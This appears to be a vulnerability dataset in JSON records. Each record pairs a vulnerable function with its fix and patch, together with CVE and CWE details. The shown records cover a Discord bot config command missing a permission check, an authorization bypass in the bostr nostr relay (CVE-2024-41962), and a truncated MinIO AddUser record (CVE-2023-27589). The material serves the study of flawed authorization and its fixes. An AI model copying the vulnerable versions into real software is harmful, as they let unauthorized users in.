"programing_language": "JavaScript", "vul_func": [{"id": "vul_js_294_1", "commit": "10002f53fcd00a9273071ba37b52843017f6871f", "file_path": "src/main/typescript/commands/settings/ConfigCommand.ts", "start_line": 25, "end_line": 555, "snippet": "class ConfigCommand extends Command {\n public override readonly name = \"config\";\n public override readonly description: string = \"Manage configuration.\";\n public override readonly defer = true;\n public override readonly systemPermissions = [];\n public override readonly usage = [\" [...args: Any[]]\"];\n public override readonly subcommandMeta: Record = {\n get: {\n description: \"Get the value of a configuration key\",\n usage: [\"\"]\n },\n set: {\n description: \"Set the value of a configuration key\",\n usage: [\" \"]\n },\n save: {\n description: \"Save the current configuration.\"\n },\n restore: {\n description: \"Restore the previously saved configuration.\"\n },\n unset: {\n description: \"Unset a configuration key\"\n }\n };\n\n @Inject()\n private readonly configManager!: ConfigurationManager;\n @Inject()\n private readonly permissionManagerService!: PermissionManagerService;\n\n protected dottedConfig = {\n guild: getZodPropertyPaths(GuildConfigSchema),\n system: getZodPropertyPaths(SystemConfigSchema)\n };\n\n public override build(): Buildable[] {\n return [\n this.buildChatInput()\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"get\")\n .setDescription(\"Get the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"unset\")\n .setDescription(\"Unset a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to unset.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"set\")\n .setDescription(\"Set the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"value\")\n .setDescription(\"The new value to set the configuration key to.\")\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"cast\")\n .setDescription(\"The type to cast the value to.\")\n .setChoices(\n {\n name: \"String\",\n value: \"string\"\n },\n {\n name: \"Number\",\n value: \"number\"\n },\n {\n name: \"Boolean\",\n value: \"boolean\"\n },\n {\n name: \"JSON\",\n value: \"json\"\n }\n )\n )\n .addBooleanOption(option =>\n option\n .setName(\"save\")\n .setDescription(\"Save the current configuration immediately.\")\n )\n .addBooleanOption(option =>\n option\n .setName(\"no_create\")\n .setDescription(\"Do not create the key if it does not exist.\")\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand.setName(\"save\").setDescription(\"Save the current configuration.\")\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"restore\")\n .setDescription(\"Restore the previously saved configuration.\")\n )\n ];\n }\n\n public override async execute(\n context: LegacyContext | InteractionContext\n ): Promise {\n const subcommand = context.isLegacy()\n ? context.argv[1]\n : context.options.getSubcommand(true);\n\n if (!subcommand) {\n await context.error(\"You must provide a subcommand.\");\n return;\n }\n\n if (\n !context.isLegacy() &&\n (subcommand === \"get\" || subcommand === \"set\" || subcommand === \"unset\") &&\n context.options.getString(\"config_type\") === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(context.member!))\n ) {\n await context.error(\n \"You do not have permission to view or change system configuration.\"\n );\n\n return;\n }\n\n switch (subcommand) {\n case \"get\":\n return this.get(context);\n case \"set\":\n return this.set(context);\n case \"unset\":\n return this.unset(context);\n case \"save\":\n return this.save(context);\n case \"restore\":\n return this.restore(context);\n default:\n await context.error(\n `The subcommand \\`${escapeInlineCode(\n subcommand\n )}\\` does not exist. Please use one of the following subcommands: \\`${this.subcommands.join(\n \"`, `\"\n )}\\`.`\n );\n return;\n }\n }\n\n @GatewayEventListener(\"interactionCreate\")\n public async onInteractionCreate(interaction: Interaction) {\n if (\n !interaction.isAutocomplete() ||\n interaction.commandName !== this.name ||\n !interaction.inGuild()\n ) {\n return;\n }\n\n const query = interaction.options.getFocused();\n const configType = (interaction.options.getString(\"config_type\") ?? \"guild\") as\n | \"guild\"\n | \"system\";\n\n if (\n configType === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(interaction.member as GuildMember))\n ) {\n await interaction.respond([]);\n return;\n }\n\n const config =\n configType === \"guild\"\n ? (this.dottedConfig?.guild ?? [])\n : (this.dottedConfig?.system ?? []);\n const keys = [];\n\n for (const key of config) {\n if (keys.length >= 25) {\n break;\n }\n\n if (key.includes(query)) {\n keys.push({ name: key, value: key });\n }\n }\n\n await interaction.respond(keys);\n }\n\n private async get(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to view.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n const configValue = get(config, key);\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Value\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(configValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async unset(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to unset.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n try {\n unset(config, key);\n } catch (error) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` could not be unset: ${(error as Error)?.message}`\n );\n\n return;\n }\n\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Key Unset\")\n .setDescription(`### ${inlineCode(key)}\\n\\nSuccessfully unset this key.`)\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async set(context: LegacyContext | InteractionContext) {\n if (context.isLegacy()) {\n if (!context.args[1]) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (!context.args[2]) {\n await context.error(\"You must provide a value to set the configuration key to.\");\n return;\n }\n }\n\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n const value = context.isLegacy()\n ? context.commandContent\n .slice(context.argv[0].length)\n .trimStart()\n .slice(context.argv[1].length)\n .trimStart()\n .slice(context.argv[2].length)\n .trim()\n : context.options.getString(\"value\", true);\n const cast = (\n context.isLegacy() ? \"json\" : (context.options.getString(\"cast\") ?? \"string\")\n ) as CastType;\n const save = context.isLegacy() ? false : context.options.getBoolean(\"save\");\n const noCreate = context.isLegacy() ? false : context.options.getBoolean(\"no_create\");\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!key) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (noCreate && !has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n let finalValue;\n\n switch (cast) {\n case \"string\":\n finalValue = value;\n break;\n case \"number\":\n finalValue = parseFloat(value);\n\n if (isNaN(finalValue)) {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid number.`\n );\n return;\n }\n\n break;\n case \"boolean\":\n {\n const lowerCased = value.toLowerCase();\n\n if (lowerCased !== \"true\" && lowerCased !== \"false\") {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid boolean.`\n );\n return;\n }\n\n finalValue = lowerCased === \"true\";\n }\n break;\n case \"json\":\n try {\n finalValue = JSON5.parse(value);\n } catch (e) {\n const error = codeBlock(\n e instanceof Object && \"message\" in e ? `${e.message}` : `${e}`\n );\n await context.reply({\n embeds: [\n {\n description: `### ${context.emoji(\n \"error\"\n )} Failed to parse the value as JSON\\n\\n${codeBlock(error.slice(0, 1800))}${\n error.length > 1800\n ? \"\\n... The error message is loo long.\"\n : \"\"\n }`,\n color: Colors.Red,\n footer: {\n text: \"No changes were made to the configuration\"\n },\n timestamp: new Date().toISOString()\n }\n ]\n });\n\n return;\n }\n\n break;\n }\n\n set(config, key, finalValue, {\n create: !noCreate\n });\n\n const embed = new EmbedBuilder();\n const error = this.configManager.testConfig();\n const errorString = error\n ? JSON5.stringify(error.error.format(), {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n : null;\n\n if (errorString && error) {\n await this.configManager.load();\n\n embed\n .setDescription(\n `### ${context.emoji(\"error\")} The configuration is invalid (${inlineCode(\n error.type\n )})\\n\\nThe changes were not saved.\\n\\n${codeBlock(errorString.slice(0, 1800))}${\n errorString.length > 1800 ? \"\\n... The error description is loo long.\" : \"\"\n }`\n )\n .setColor(Colors.Red)\n .setFooter({ text: \"The configuration was not saved.\" });\n\n await context.replyEmbed(embed);\n return;\n }\n\n embed\n .setTitle(\"Configuration Value Changed\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(finalValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp()\n .setFooter({ text: `The configuration was ${save ? \"saved\" : \"applied\"}.` });\n\n if (save) {\n await this.configManager.write({\n guild: configType === \"guild\",\n system: configType === \"system\"\n });\n }\n\n await context.replyEmbed(embed);\n }\n\n private async save(context: LegacyContext | InteractionContext) {\n await this.configManager.write();\n await context.success(\"The configuration was saved.\");\n }\n\n private async restore(\n context: LegacyContext | InteractionContext\n ) {\n await this.configManager.load();\n await context.success(\"The configuration was restored.\");\n }\n}"}], "fix_func": [{"id": "fix_js_294_1", "commit": "ef46ca98562f3c1abef4ff7dd94d8f7b8155ee50", "file_path": "src/main/typescript/commands/settings/ConfigCommand.ts", "start_line": 26, "end_line": 557, "snippet": "class ConfigCommand extends Command {\n public override readonly name = \"config\";\n public override readonly description: string = \"Manage configuration.\";\n public override readonly defer = true;\n public override readonly systemPermissions = [];\n public override readonly usage = [\" [...args: Any[]]\"];\n public override readonly subcommandMeta: Record = {\n get: {\n description: \"Get the value of a configuration key\",\n usage: [\"\"]\n },\n set: {\n description: \"Set the value of a configuration key\",\n usage: [\" \"]\n },\n save: {\n description: \"Save the current configuration.\"\n },\n restore: {\n description: \"Restore the previously saved configuration.\"\n },\n unset: {\n description: \"Unset a configuration key\"\n }\n };\n public override readonly permissions = [PermissionFlags.ManageGuild];\n\n @Inject()\n private readonly configManager!: ConfigurationManager;\n @Inject()\n private readonly permissionManagerService!: PermissionManagerService;\n\n protected dottedConfig = {\n guild: getZodPropertyPaths(GuildConfigSchema),\n system: getZodPropertyPaths(SystemConfigSchema)\n };\n\n public override build(): Buildable[] {\n return [\n this.buildChatInput()\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"get\")\n .setDescription(\"Get the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"unset\")\n .setDescription(\"Unset a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to unset.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"set\")\n .setDescription(\"Set the value of a configuration key\")\n .addStringOption(option =>\n option\n .setName(\"key\")\n .setDescription(\"The configuration key to view or change.\")\n .setAutocomplete(true)\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"value\")\n .setDescription(\"The new value to set the configuration key to.\")\n .setRequired(true)\n )\n .addStringOption(option =>\n option\n .setName(\"cast\")\n .setDescription(\"The type to cast the value to.\")\n .setChoices(\n {\n name: \"String\",\n value: \"string\"\n },\n {\n name: \"Number\",\n value: \"number\"\n },\n {\n name: \"Boolean\",\n value: \"boolean\"\n },\n {\n name: \"JSON\",\n value: \"json\"\n }\n )\n )\n .addBooleanOption(option =>\n option\n .setName(\"save\")\n .setDescription(\"Save the current configuration immediately.\")\n )\n .addBooleanOption(option =>\n option\n .setName(\"no_create\")\n .setDescription(\"Do not create the key if it does not exist.\")\n )\n .addStringOption(option =>\n option\n .setName(\"config_type\")\n .setDescription(\"The configuration type\")\n .setChoices(\n {\n name: \"Guild\",\n value: \"guild\"\n },\n {\n name: \"System\",\n value: \"system\"\n }\n )\n )\n )\n .addSubcommand(subcommand =>\n subcommand.setName(\"save\").setDescription(\"Save the current configuration.\")\n )\n .addSubcommand(subcommand =>\n subcommand\n .setName(\"restore\")\n .setDescription(\"Restore the previously saved configuration.\")\n )\n ];\n }\n\n public override async execute(\n context: LegacyContext | InteractionContext\n ): Promise {\n const subcommand = context.isLegacy()\n ? context.argv[1]\n : context.options.getSubcommand(true);\n\n if (!subcommand) {\n await context.error(\"You must provide a subcommand.\");\n return;\n }\n\n if (\n !context.isLegacy() &&\n (subcommand === \"get\" || subcommand === \"set\" || subcommand === \"unset\") &&\n context.options.getString(\"config_type\") === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(context.member!))\n ) {\n await context.error(\n \"You do not have permission to view or change system configuration.\"\n );\n\n return;\n }\n\n switch (subcommand) {\n case \"get\":\n return this.get(context);\n case \"set\":\n return this.set(context);\n case \"unset\":\n return this.unset(context);\n case \"save\":\n return this.save(context);\n case \"restore\":\n return this.restore(context);\n default:\n await context.error(\n `The subcommand \\`${escapeInlineCode(\n subcommand\n )}\\` does not exist. Please use one of the following subcommands: \\`${this.subcommands.join(\n \"`, `\"\n )}\\`.`\n );\n return;\n }\n }\n\n @GatewayEventListener(\"interactionCreate\")\n public async onInteractionCreate(interaction: Interaction) {\n if (\n !interaction.isAutocomplete() ||\n interaction.commandName !== this.name ||\n !interaction.inGuild()\n ) {\n return;\n }\n\n const query = interaction.options.getFocused();\n const configType = (interaction.options.getString(\"config_type\") ?? \"guild\") as\n | \"guild\"\n | \"system\";\n\n if (\n configType === \"system\" &&\n !(await this.permissionManagerService.isSystemAdmin(interaction.member as GuildMember))\n ) {\n await interaction.respond([]);\n return;\n }\n\n const config =\n configType === \"guild\"\n ? (this.dottedConfig?.guild ?? [])\n : (this.dottedConfig?.system ?? []);\n const keys = [];\n\n for (const key of config) {\n if (keys.length >= 25) {\n break;\n }\n\n if (key.includes(query)) {\n keys.push({ name: key, value: key });\n }\n }\n\n await interaction.respond(keys);\n }\n\n private async get(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to view.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n const configValue = get(config, key);\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Value\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(configValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async unset(context: LegacyContext | InteractionContext) {\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n\n if (!key) {\n await context.error(\"You must provide a configuration key to unset.\");\n return;\n }\n\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n try {\n unset(config, key);\n } catch (error) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` could not be unset: ${(error as Error)?.message}`\n );\n\n return;\n }\n\n const embed = new EmbedBuilder()\n .setTitle(\"Configuration Key Unset\")\n .setDescription(`### ${inlineCode(key)}\\n\\nSuccessfully unset this key.`)\n .setColor(Colors.Green)\n .setTimestamp();\n\n await context.replyEmbed(embed);\n }\n\n private async set(context: LegacyContext | InteractionContext) {\n if (context.isLegacy()) {\n if (!context.args[1]) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (!context.args[2]) {\n await context.error(\"You must provide a value to set the configuration key to.\");\n return;\n }\n }\n\n const key = context.isLegacy() ? context.args[1] : context.options.getString(\"key\", true);\n const value = context.isLegacy()\n ? context.commandContent\n .slice(context.argv[0].length)\n .trimStart()\n .slice(context.argv[1].length)\n .trimStart()\n .slice(context.argv[2].length)\n .trim()\n : context.options.getString(\"value\", true);\n const cast = (\n context.isLegacy() ? \"json\" : (context.options.getString(\"cast\") ?? \"string\")\n ) as CastType;\n const save = context.isLegacy() ? false : context.options.getBoolean(\"save\");\n const noCreate = context.isLegacy() ? false : context.options.getBoolean(\"no_create\");\n const configType = (\n context.isLegacy() ? \"guild\" : (context.options.getString(\"config_type\") ?? \"guild\")\n ) as \"guild\" | \"system\";\n const config = configType === \"guild\" ? context.config : this.configManager.systemConfig;\n\n if (!config) {\n await context.error(\"No configuration exists for this server.\");\n return;\n }\n\n if (!key) {\n await context.error(\"You must provide a configuration key to set.\");\n return;\n }\n\n if (noCreate && !has(config, key)) {\n await context.error(\n `The configuration key \\`${escapeInlineCode(key)}\\` does not exist.`\n );\n return;\n }\n\n let finalValue;\n\n switch (cast) {\n case \"string\":\n finalValue = value;\n break;\n case \"number\":\n finalValue = parseFloat(value);\n\n if (isNaN(finalValue)) {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid number.`\n );\n return;\n }\n\n break;\n case \"boolean\":\n {\n const lowerCased = value.toLowerCase();\n\n if (lowerCased !== \"true\" && lowerCased !== \"false\") {\n await context.error(\n `The value \\`${escapeInlineCode(value)}\\` is not a valid boolean.`\n );\n return;\n }\n\n finalValue = lowerCased === \"true\";\n }\n break;\n case \"json\":\n try {\n finalValue = JSON5.parse(value);\n } catch (e) {\n const error = codeBlock(\n e instanceof Object && \"message\" in e ? `${e.message}` : `${e}`\n );\n await context.reply({\n embeds: [\n {\n description: `### ${context.emoji(\n \"error\"\n )} Failed to parse the value as JSON\\n\\n${codeBlock(error.slice(0, 1800))}${\n error.length > 1800\n ? \"\\n... The error message is loo long.\"\n : \"\"\n }`,\n color: Colors.Red,\n footer: {\n text: \"No changes were made to the configuration\"\n },\n timestamp: new Date().toISOString()\n }\n ]\n });\n\n return;\n }\n\n break;\n }\n\n set(config, key, finalValue, {\n create: !noCreate\n });\n\n const embed = new EmbedBuilder();\n const error = this.configManager.testConfig();\n const errorString = error\n ? JSON5.stringify(error.error.format(), {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n : null;\n\n if (errorString && error) {\n await this.configManager.load();\n\n embed\n .setDescription(\n `### ${context.emoji(\"error\")} The configuration is invalid (${inlineCode(\n error.type\n )})\\n\\nThe changes were not saved.\\n\\n${codeBlock(errorString.slice(0, 1800))}${\n errorString.length > 1800 ? \"\\n... The error description is loo long.\" : \"\"\n }`\n )\n .setColor(Colors.Red)\n .setFooter({ text: \"The configuration was not saved.\" });\n\n await context.replyEmbed(embed);\n return;\n }\n\n embed\n .setTitle(\"Configuration Value Changed\")\n .setDescription(\n `### ${inlineCode(key)}\\n\\n${codeBlock(\n \"json\",\n JSON5.stringify(finalValue, {\n space: 2,\n replacer: null,\n quote: '\"'\n })\n )}`\n )\n .setColor(Colors.Green)\n .setTimestamp()\n .setFooter({ text: `The configuration was ${save ? \"saved\" : \"applied\"}.` });\n\n if (save) {\n await this.configManager.write({\n guild: configType === \"guild\",\n system: configType === \"system\"\n });\n }\n\n await context.replyEmbed(embed);\n }\n\n private async save(context: LegacyContext | InteractionContext) {\n await this.configManager.write();\n await context.success(\"The configuration was saved.\");\n }\n\n private async restore(\n context: LegacyContext | InteractionContext\n ) {\n await this.configManager.load();\n await context.success(\"The configuration was restored.\");\n }\n}"}], "vul_patch": "--- a/src/main/typescript/commands/settings/ConfigCommand.ts\n+++ b/src/main/typescript/commands/settings/ConfigCommand.ts\n@@ -23,6 +23,7 @@\n description: \"Unset a configuration key\"\n }\n };\n+ public override readonly permissions = [PermissionFlags.ManageGuild];\n \n @Inject()\n private readonly configManager!: ConfigurationManager;\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-41962", "cve_description": "Bostr is an nostr relay aggregator proxy that acts like a regular nostr relay. bostr let everyone in even having authorized_keys being set when noscraper is set to true. This vulnerability is fixed in 3.0.10.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/Yonle/bostr", "patch_url": ["https://github.com/Yonle/bostr/commit/49181f4ec9ae1472c6675cab56bbc01e723855af"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_104_1", "commit": "8b131e2", "file_path": "auth.js", "start_line": 14, "end_line": 45, "snippet": "module.exports = (authKey, data, ws, req) => {\n if (!authorized_keys?.length && !Object.keys(private_keys).length && !noscraper) return; // do nothing\n if (!validateEvent(data) || !verifyEvent(data)) {\n ws.send(JSON.stringify([\"NOTICE\", \"error: invalid challenge response.\"]));\n return false;\n }\n\n if (!authorized_keys?.includes(data.pubkey) && !private_keys[data.pubkey] && !noscraper) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unauthorized.\"]));\n return false;\n }\n\n if (data.kind != 22242) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"not kind 22242.\"]));\n return false;\n }\n\n const tags = Object.fromEntries(data.tags);\n\n if (!tags.relay?.includes(req.headers.host)) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched relay url.\"]));\n return false;\n };\n\n if (tags.challenge !== authKey) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched challenge string.\"]));\n return false;\n }\n\n ws.send(JSON.stringify([\"OK\", data.id, true, `Hello ${data.pubkey}`]));\n return true;\n}"}], "fix_func": [{"id": "fix_js_104_1", "commit": "49181f4", "file_path": "auth.js", "start_line": 14, "end_line": 47, "snippet": "module.exports = (authKey, data, ws, req) => {\n if (!authorized_keys?.length && !Object.keys(private_keys).length && !noscraper) return; // do nothing\n if (!validateEvent(data) || !verifyEvent(data)) {\n ws.send(JSON.stringify([\"NOTICE\", \"error: invalid challenge response.\"]));\n return false;\n }\n\n let pubkeyInConfig = authorized_keys?.includes(data.pubkey) || data.pubkey in private_keys;\n\n if (authorized_keys?.length && !pubkeyInConfig) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unauthorized.\"]));\n return false;\n }\n\n if (data.kind != 22242) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"not kind 22242.\"]));\n return false;\n }\n\n const tags = Object.fromEntries(data.tags);\n\n if (!tags.relay?.includes(req.headers.host)) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched relay url.\"]));\n return false;\n };\n\n if (tags.challenge !== authKey) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unmatched challenge string.\"]));\n return false;\n }\n\n ws.send(JSON.stringify([\"OK\", data.id, true, `Hello ${data.pubkey}`]));\n return true;\n}"}], "vul_patch": "--- a/auth.js\n+++ b/auth.js\n@@ -5,7 +5,9 @@\n return false;\n }\n \n- if (!authorized_keys?.includes(data.pubkey) && !private_keys[data.pubkey] && !noscraper) {\n+ let pubkeyInConfig = authorized_keys?.includes(data.pubkey) || data.pubkey in private_keys;\n+\n+ if (authorized_keys?.length && !pubkeyInConfig) {\n ws.send(JSON.stringify([\"OK\", data.id, false, \"unauthorized.\"]));\n return false;\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-27589", "cve_description": "Minio is a Multi-Cloud Object Storage framework. Starting with RELEASE.2020-12-23T02-24-12Z and prior to RELEASE.2023-03-13T19-46-17Z, a user with `consoleAdmin` permissions can potentially create a user that matches the root credential `accessKey`. Once this user is created successfully, the root credential ceases to work appropriately. The issue is patched in RELEASE.2023-03-13T19-46-17Z. There are ways to work around this via adding higher privileges to the disabled root user via `mc admin policy set`.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/minio/minio", "patch_url": ["https://github.com/minio/minio/commit/c7f7e67a100ce35af559e3f49a2ed0b67deaa919"], "programing_language": "Go", "vul_func": [{"id": "vul_go_92_1", "commit": "628042e", "file_path": "cmd/admin-handlers-users.go", "start_line": "412", "end_line": "516", "snippet": "func (a adminAPIHandlers) AddUser(w http.ResponseWriter, r *http.Request) {\n\tctx := newContext(r, w, \"AddUser\")\n\n\tdefer logger.AuditLog(ctx, w, r, mustGetClaimsFromToken(r))\n\n\tvars := mux.Vars(r)\n\taccessKey := vars[\"accessKey\"]\n\n\t// Get current object layer instance.\n\tobjectAPI := newObjectLayerFn()\n\tif objectAPI == nil || globalNotificationSys == nil {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrServerNotInitialized), r.URL)\n\t\treturn\n\t}\n\n\tcred, owner, s3Err := validateAdminSignature(ctx, r, \"\")\n\tif s3Err != ErrNone {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(s3Err), r.URL)\n\t\treturn\n\t}\n\n\t// Not allowed to add a user with same access key as root credential\n\tif owner && accessKey == cred.AccessKey {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tuser, exists := globalIAMSys.GetUser(ctx, accessKey)\n\tif exists && (user.Credentials.IsTemp() || user.Credentials.IsServiceAccount()) {\n\t\t// Updating STS credential is not allowed, and this API does not\n\t\t// support updating service accounts.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tif (cred.IsTemp() || cred.IsServiceAccount()) && cred.ParentUser == accessKey {\n\t\t// Incoming access key matches parent user then we should\n\t\t// reject password change requests.\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAddUserInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\t// Check if accessKey has beginning and end space characters, this only applies to new users.\n\tif !exists && hasSpaceBE(accessKey) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAdminResourceInvalidArgument), r.URL)\n\t\treturn\n\t}\n\n\tcheckDenyOnly := false\n\tif accessKey == cred.AccessKey {\n\t\t// Check that there is no explicit deny - otherwise it's allowed\n\t\t// to change one's own password.\n\t\tcheckDenyOnly = true\n\t}\n\n\tif !globalIAMSys.IsAllowed(iampolicy.Args{\n\t\tAccountName: cred.AccessKey,\n\t\tGroups: cred.Groups,\n\t\tAction: iampolicy.CreateUserAdminAction,\n\t\tConditionValues: getConditionValues(r, \"\", cred),\n\t\tIsOwner: owner,\n\t\tClaims: cred.Claims,\n\t\tDenyOnly: checkDenyOnly,\n\t}) {\n\t\twriteErrorResponseJSON(ctx, w, errorCodes.ToAPIErr(ErrAccessDenied), 